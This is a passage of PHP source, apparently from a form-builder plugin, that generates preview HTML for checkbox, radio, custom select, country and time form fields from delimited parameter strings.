										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="checkbox" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'"
										'.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									}	
								}
							else
								for($l=0; $l<count($param['w_choices']); $l++)
								{
									if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$i+$l)
											$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="checkbox" value="" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" other="1" onclick="if(set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)) show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'">'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									else
									{
										$where = '' ;
										$order_by = '' ;
										$db_info = '' ;
										if(isset($param['w_choices_value']))
											$choise_value = $param['w_choices_value'][(int)$param['w_rowcol']*$i+$l];
										else
											$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$i+$l];
							
										if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$i+$l])
										{
											$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$i+$l]);
											$where = "where='".$w_choices_params[0]."'";
											$w_choices_params = explode('[db_info]',$w_choices_params[1]);
											$order_by = "order_by='".$w_choices_params[0]."'";
											$db_info = "db_info='".$w_choices_params[1]."'";
										}
									
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="checkbox" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									}
								}
							
							$rep.='</div>';	
                }
                
                if(count($param['w_choices'])%$param['w_rowcol']!=0)
                {
                  $rep.='<div id="'.$id.'_element_tr'.((int)(count($param['w_choices'])/(int)$param['w_rowcol'])).'" style="display: table-row;">';
                  
                  for($k=0; $k<count($param['w_choices'])%$param['w_rowcol']; $k++)
                  {
                    $l = count($param['w_choices']) - count($param['w_choices'])%$param['w_rowcol'] + $k;
                    if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$l)
										$rep.='<div valign="top" id="'.$id.'_td_little'.$l.'" idi="'.$l.'" style="display: table-cell;"><input type="checkbox" value="" id="'.$id.'_elementform_id_temp'.$l.'" name="'.$id.'_elementform_id_temp'.$l.'" other="1" onclick="if(set_checked(&quot;'.$id.'&quot;,&quot;'.$l.'&quot;,&quot;form_id_temp&quot;)) show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$l.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$l.'">'.$param['w_choices'][$l].'</label></div>';
								else
								{
									$where = '' ;
									$order_by = '' ;
									$db_info = '' ;
									if(isset($param['w_choices_value']))
										$choise_value = $param['w_choices_value'][$l];
									else
										$choise_value = $param['w_choices'][$l];
							
									if(isset($param['w_choices_params']) && $param['w_choices_params'][$l])
									{
										$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$l]);
										$where = "where='".$w_choices_params[0]."'";
										$w_choices_params = explode('[db_info]',$w_choices_params[1]);
										$order_by = "order_by='".$w_choices_params[0]."'";
										$db_info = "db_info='".$w_choices_params[1]."'";
									}
									$rep.='<div valign="top" id="'.$id.'_td_little'.$l.'" idi="'.$l.'" style="display: table-cell;"><input type="checkbox" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.$l.'" name="'.$id.'_elementform_id_temp'.$l.'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.$l.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$l.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$l.'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][$l].'</label></div>';
								}	
                  }
                  
                  $rep.='</div>';	
                }
                
      
              
            }
            $rep.='</div></div></div></div>';
              break;
            }
            case 'type_radio':
            {
            
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_value_disabled', 'w_choices_value', 'w_choices_params','w_class');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              if(!isset($param['w_value_disabled']))
						$param['w_value_disabled'] = 'no';
					
			  if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
			  
              if(isset($param['w_choices_value']))
					{
						$param['w_choices_value'] = explode('***',$param['w_choices_value']);
						$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
					}
              
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='checked="checked"';
                else
                  $param['w_choices_checked'][$key]='';
              }	
              
              $rep='<div id="wdform_field'.$id.'" type="type_radio" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_radio" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_randomize'].'" name="'.$id.'_randomizeform_id_temp" id="'.$id.'_randomizeform_id_temp"><input type="hidden" value="'.$param['w_allow_other'].'" name="'.$id.'_allow_otherform_id_temp" id="'.$id.'_allow_otherform_id_temp"><input type="hidden" value="'.$param['w_allow_other_num'].'" name="'.$id.'_allow_other_numform_id_temp" id="'.$id.'_allow_other_numform_id_temp"><input type="hidden" value="'.$param['w_rowcol'].'" name="'.$id.'_rowcol_numform_id_temp" id="'.$id.'_rowcol_numform_id_temp"><input type="hidden" value="'.$param['w_field_option_pos'].'" id="'.$id.'_option_left_right"><input type="hidden" value="'.$param['w_value_disabled'].'" name="'.$id.'_value_disabledform_id_temp" id="'.$id.'_value_disabledform_id_temp"><div style="display: table;"><div id="'.$id.'_table_little" style="display: table-row-group;" '.($param['w_flow']=='hor' ? 'for_hor="'.$id.'_hor"' : '').'>';
            
            
              if($param['w_flow']=='hor')
              {
                $j = 0;
                for($i=0; $i<(int)$param['w_rowcol']; $i++)
                {
                  $rep.='<div id="'.$id.'_element_tr'.$i.'" style="display: table-row;">';
                  
                    for($l=0; $l<=(int)(count($param['w_choices'])/$param['w_rowcol']); $l++)
                    {
                      if($j >= count($param['w_choices'])%$param['w_rowcol'] && $l==(int)(count($param['w_choices'])/$param['w_rowcol']))
                      continue;
                      
                      if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$l+$i)
											$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$l+$i).'" idi="'.((int)$param['w_rowcol']*$l+$i).'" style="display: table-cell;"><input type="radio" value="'.$param['w_choices'][(int)$param['w_rowcol']*$l+$i].'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" name="'.$id.'_elementform_id_temp" other="1" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$l+$i).'&quot;,&quot;form_id_temp&quot;); show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$l+$i].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$l+$i).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'">'.$param['w_choices'][(int)$param['w_rowcol']*$l+$i].'</label></div>';
										else	
										{
											$where = '' ;
											$order_by = '' ;
											$db_info = '' ;
											if(isset($param['w_choices_value']))
												$choise_value = $param['w_choices_value'][(int)$param['w_rowcol']*$l+$i];	
											else
												$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$l+$i];
												
											if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$l+$i])
											{
												$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$l+$i]);
												$where = "where='".$w_choices_params[0]."'";
												$w_choices_params = explode('[db_info]',$w_choices_params[1]);
												$order_by = "order_by='".$w_choices_params[0]."'";
												$db_info = "db_info='".$w_choices_params[1]."'";
											}
											
											$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$l+$i).'" idi="'.((int)$param['w_rowcol']*$l+$i).'" style="display: table-cell;"><input type="radio" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" name="'.$id.'_elementform_id_temp" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$l+$i).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$l+$i].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$l+$i).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$l+$i).'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$l+$i].'</label></div>';
										}		
                    }
                    
                  $j++;
                  $rep.='</div>';	
                  
                }
        
              }
              else
              {
                for($i=0; $i<(int)(count($param['w_choices'])/$param['w_rowcol']); $i++)
                {
                  $rep.='<div id="'.$id.'_element_tr'.$i.'" style="display: table-row;">';
							
							if(count($param['w_choices']) > (int)$param['w_rowcol'])
								for($l=0; $l<$param['w_rowcol']; $l++)
								{
									if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$i+$l)
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="radio" value="'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp" other="1" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;); show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].'  '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'">'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									else
									{
										$where = '' ;
										$order_by = '' ;
										$db_info = '' ;
										if(isset($param['w_choices_value']))
											$choise_value = $param['w_choices_value'][(int)$param['w_rowcol']*$i+$l];	
										else
											$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$i+$l];

										if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$i+$l])
										{
											$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$i+$l]);
											$where = "where='".$w_choices_params[0]."'";
											$w_choices_params = explode('[db_info]',$w_choices_params[1]);
											$order_by = "order_by='".$w_choices_params[0]."'";
											$db_info = "db_info='".$w_choices_params[1]."'";
										}		
									
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="radio" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									}	
								}
							else
								for($l=0; $l<count($param['w_choices']); $l++)
								{
									if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==(int)$param['w_rowcol']*$i+$l)
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="radio" value="'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp" other="1" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;); show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").'  disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'">'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									else
									{
										$where = '' ;
										$order_by = '' ;
										$db_info = '' ;
										if(isset($param['w_choices_value']))
											$choise_value = $param['w_choices_value'][(int)$param['w_rowcol']*$i+$l];	
										else
											$choise_value = $param['w_choices'][(int)$param['w_rowcol']*$i+$l];

										if(isset($param['w_choices_params']) && $param['w_choices_params'][(int)$param['w_rowcol']*$i+$l])
										{
											$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][(int)$param['w_rowcol']*$i+$l]);
											$where = "where='".$w_choices_params[0]."'";
											$w_choices_params = explode('[db_info]',$w_choices_params[1]);
											$order_by = "order_by='".$w_choices_params[0]."'";
											$db_info = "db_info='".$w_choices_params[1]."'";
										}		
									
										$rep.='<div valign="top" id="'.$id.'_td_little'.((int)$param['w_rowcol']*$i+$l).'" idi="'.((int)$param['w_rowcol']*$i+$l).'" style="display: table-cell;"><input type="radio" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" name="'.$id.'_elementform_id_temp" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.((int)$param['w_rowcol']*$i+$l).'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][(int)$param['w_rowcol']*$i+$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.((int)$param['w_rowcol']*$i+$l).'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.((int)$param['w_rowcol']*$i+$l).'" '.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][(int)$param['w_rowcol']*$i+$l].'</label></div>';
									}	
								}
							
							$rep.='</div>';	
                }
                
                if(count($param['w_choices'])%$param['w_rowcol']!=0)
                {
                  $rep.='<div id="'.$id.'_element_tr'.((int)(count($param['w_choices'])/(int)$param['w_rowcol'])).'" style="display: table-row;">';
							
							for($k=0; $k<count($param['w_choices'])%$param['w_rowcol']; $k++)
							{
								$l = count($param['w_choices']) - count($param['w_choices'])%$param['w_rowcol'] + $k;
								if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$l)
									$rep.='<div valign="top" id="'.$id.'_td_little'.$l.'" idi="'.$l.'" style="display: table-cell;"><input type="radio" value="'.$param['w_choices'][$l].'" id="'.$id.'_elementform_id_temp'.$l.'" name="'.$id.'_elementform_id_temp" other="1" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$l.'&quot;,&quot;form_id_temp&quot;); show_other_input(&quot;'.$id.'&quot;,&quot;form_id_temp&quot;);" '.$param['w_choices_checked'][$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$l.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$l.'">'.$param['w_choices'][$l].'</label></div>';
								else
								{
									$where = '' ;
									$order_by = '' ;
									$db_info = '' ;
									if(isset($param['w_choices_value']))
										$choise_value = $param['w_choices_value'][$l];
									else
										$choise_value = $param['w_choices'][$l];
									
									if(isset($param['w_choices_params']) && $param['w_choices_params'][$l])
									{
										$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$l]);
										$where = "where='".$w_choices_params[0]."'";
										$w_choices_params = explode('[db_info]',$w_choices_params[1]);
										$order_by = "order_by='".$w_choices_params[0]."'";
										$db_info = "db_info='".$w_choices_params[1]."'";
									}
								
									$rep.='<div valign="top" id="'.$id.'_td_little'.$l.'" idi="'.$l.'" style="display: table-cell;"><input type="radio" value="'.$choise_value.'" id="'.$id.'_elementform_id_temp'.$l.'" name="'.$id.'_elementform_id_temp" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$l.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$l].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$l.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$l.'"
									'.$where.' '.$order_by.' '.$db_info.'>'.$param['w_choices'][$l].'</label></div>';
								}	
							}
							
							$rep.='</div>';	
                }
                
              }
                  
              
        
            $rep.='</div></div></div></div>';
            
              break;
            }
            case 'type_own_select':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled','w_required','w_class');
              $temp=$params;
			  if(strpos($temp, 'w_choices_value') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled', 'w_required', 'w_value_disabled', 'w_choices_value', 'w_choices_params', 'w_class');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              $param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);
			  
              if(isset($param['w_choices_value']))
					{
						$param['w_choices_value'] = explode('***',$param['w_choices_value']);
						$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
					}
					
			   if(!isset($param['w_value_disabled']))
						$param['w_value_disabled'] = 'no';
						
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='selected="selected"';
                else
                  $param['w_choices_checked'][$key]='';
              }
              
              $rep='<div id="wdform_field'.$id.'" type="type_own_select" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; "><input type="hidden" value="type_own_select" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_value_disabled'].'" name="'.$id.'_value_disabledform_id_temp" id="'.$id.'_value_disabledform_id_temp"><select id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" onchange="set_select(this)" style="width: '.$param['w_size'].'px;"  '.$param['attributes'].' disabled>';
              foreach($param['w_choices'] as $key => $choice)
              {
                        $where = '';
						$order_by = '';
						$db_info = '';
						$choice_value = $param['w_choices_disabled'][$key]=='true' ? '' : (isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice);
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}
					
						$rep.='<option id="'.$id.'_option'.$key.'" value="'.$choice_value.'" onselect="set_select(&quot;'.$id.'_option'.$key.'&quot;)" '.$param['w_choices_checked'][$key].' '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</option>';
              }
              $rep.='</select></div></div>';
              break;
            }
            
            case 'type_country':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_countries','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_countries']	= explode('***',$param['w_countries']);
            
              $rep='<div id="wdform_field'.$id.'" type="type_country" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; "><input type="hidden" value="type_country" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><select id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" style="width: '.$param['w_size'].'px;"  '.$param['attributes'].' disabled>';
              foreach($param['w_countries'] as $key => $choice)
              {
                $choice_value=$choice;
                $rep.='<option value="'.$choice_value.'">'.$choice.'</option>';
              }
              $rep.='</select></div></div>';
              break;
            }
            
            case 'type_time':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_time_type','w_am_pm','w_sec','w_hh','w_mm','w_ss','w_mini_labels','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
            
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              
            
              if($param['w_sec']=='1')
              {
                $w_sec = '<div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div id="'.$id.'_td_time_input3" style="width: 32px; display: table-cell;"><input type="text" value="'.$param['w_ss'].'" class="time_box" id="'.$id.'_ssform_id_temp" name="'.$id.'_ssform_id_temp" onkeypress="return check_second(event, &quot;'.$id.'_ssform_id_temp&quot;)" onkeyup="change_second(&quot;'.$id.'_ssform_id_temp&quot;)" onblur="add_0(&quot;'.$id.'_ssform_id_temp&quot;)" '.$param['attributes'].' disabled /></div>';
                $w_sec_label='<div style="display: table-cell;"></div><div id="'.$id.'_td_time_label3" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_ss">'.$w_mini_labels[2].'</label></div>';
              }
              else
              {
                $w_sec = '';
                $w_sec_label='';
              }
              
              if($param['w_time_type']=='12')
              {
                if($param['w_am_pm']=='am')
                {
                  $am_ = "selected=\"selected\"";
                  $pm_ = "";
                }	
                else
                {
                  $am_ = "";
                  $pm_ = "selected=\"selected\"";
                  
                }	
              
              $w_time_type = '<div id="'.$id.'_am_pm_select" class="td_am_pm_select" style="display: table-cell;"><select class="am_pm_select" name="'.$id.'_am_pmform_id_temp" id="'.$id.'_am_pmform_id_temp" onchange="set_sel_am_pm(this)" '.$param['attributes'].'><option value="am" '.$am_.'>AM</option><option value="pm" '.$pm_.'>PM</option></select></div>';
              
              $w_time_type_label = '<div id="'.$id.'_am_pm_label" class="td_am_pm_select" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_am_pm">'.$w_mini_labels[3].'</label></div>';
              
              }
              else
              {
              $w_time_type='';
              $w_time_type_label = '';
              }

              
